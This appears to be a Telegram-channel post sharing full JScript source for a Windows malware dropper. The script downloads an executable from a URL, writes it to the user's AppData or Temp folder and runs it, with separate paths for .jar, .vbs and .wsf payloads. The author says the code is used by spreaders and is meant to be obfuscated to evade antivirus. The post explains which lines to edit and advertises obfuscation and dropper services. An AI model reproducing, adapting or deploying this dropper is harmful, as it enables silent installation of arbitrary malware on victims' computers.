.jpeg)
.jpeg)
👨💻 Simple Malware JS Dropper Source Code 👨💻
🔥 This code is a simple dropper, used recently by spreader. It will be obfuscated to avoid antivirus protection. To make sure how the script works, let me explain.
1️⃣ Download Payload
The script uses an HTTP request to download an executable file (windows.exe) from a specified URL (fileUrl).
var fileUrl = "https://url.com/windows.exe";
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();
2️⃣ Save the Payload
The script saves the downloaded file to a specific location on the user’s file system, either in the temporary files directory or the application data directory.
var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1; // binary
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2); // save to file
stream.close();
3️⃣ Execute the Payload
After saving the file, the script executes it. It checks the file extension to determine the appropriate method for execution:
➡️.jar files are run using java -jar. ➡️.vbs and .wsf files are run using wscript. ➡️Other file types are executed directly.
if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}
🦅 To edit the script, edit line…
➡️ 10 for the fileName. ➡️ 11 for the fileUrl. ➡️ 12 for the useTempPath (using it would be “true” and doesn’t need admin)
Full Code
try {
String.prototype.endsWith = function (suffix) {
var substring = this.substr(this.length - suffix.length);
return substring == suffix;
};
var shell = WScript.CreateObject("WScript.Shell");
var tempPath = shell.ExpandEnvironmentStrings("%temp%");
var appDataPath = shell.ExpandEnvironmentStrings("%appdata%");
var fileName = "windows.exe";
var fileUrl = "https://test/windows.exe";
var useTempPath = false;
if (useTempPath) {
fileName = tempPath + "\\" + fileName;
} else {
fileName = appDataPath + "\\" + fileName;
}
var httpRequest = WScript.CreateObject("Microsoft.XMLHTTP");
httpRequest.open("GET", fileUrl, false);
httpRequest.send();
if (httpRequest.status == 200) {
var stream = WScript.CreateObject("Adodb.Stream");
stream.Type = 1;
stream.open();
stream.write(httpRequest.responseBody);
stream.savetofile(fileName, 2);
stream.close();
if (fileName.endsWith(".jar")) {
shell.run("java -jar \"" + fileName + "\"");
} else if (fileName.endsWith(".vbs") || fileName.endsWith(".wsf")) {
shell.run("wscript \"" + fileName + "\"");
} else {
shell.run("\"" + fileName + "\"");
}
} else {
WScript.Echo("Expired link");
}
} catch (error) {}
🔗Share and Support : https://t.me/cyberxbd ♾Obfuscating your script ⚡️Dropper with Telegram
.jpeg&description=Simple%20Malware%20JS%20Dropper%20Source%20Code){kind=link}